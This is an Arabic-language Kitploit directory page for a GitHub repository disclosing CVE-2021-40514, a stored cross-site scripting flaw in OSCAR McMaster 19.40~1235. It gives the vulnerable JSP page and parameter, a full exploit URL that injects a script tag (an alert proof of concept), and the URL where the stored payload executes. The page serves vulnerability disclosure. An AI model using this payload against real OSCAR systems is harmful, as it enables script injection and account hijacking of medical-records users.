Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-40514 — CVE-2021-40514 OSCAR McMaster 19.40~1235 ثغرة البرمجة النصية عبر المواقع المخزنة. | Kitploit
أدوات/GitHubGitHub/war4uthor/cve-2021-40514
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubwar4uthor/cve-2021-40514

CVE-2021-40514

CVE-2021-40514 OSCAR McMaster 19.40~1235 ثغرة البرمجة النصية عبر المواقع المخزنة.

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-40514 OSCAR McMaster 19.40~1235 ثغرة تخزين البرمجة النصية عبر المواقع (XSS)

توجد ثغرة تخزين البرمجة النصية عبر المواقع (Stored XSS) في عدة صفحات من الإصدار 19.40~1235 لتطبيق OSCAR McMaster، مما يسمح بتنفيذ أوامر JavaScript بشكل تعسفي.

[عنصر نائب لـ CVE mitre]

صفحات JSP المتأثرة:

providercontrol.jsp - معامل mygroupno

مثال على حمولة الاستغلال:

/oscar/provider/providercontrol.jsp?provider_no=999998&start_hour=8&end_hour=18&every_min=15&color_template=deepblue&dboperation=updatepreference&displaymode=updatepreference&default_servicetype=&prescriptionQrCodes=false&erx_enable=false&erx_training_mode=false&mygroup_no=%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E&programId_oscarView=0

يتم تنفيذ الاستجابة المخزنة على المستخدم عبر الرابط التالي:

/oscar/provider/providercontrol.jsp?year=2021&month=8&day=1&view=0&displaymode=month&dboperation=searchappointmentmonth

اكتشفها Jack McBride، أغسطس 2021

تنزيل الأداة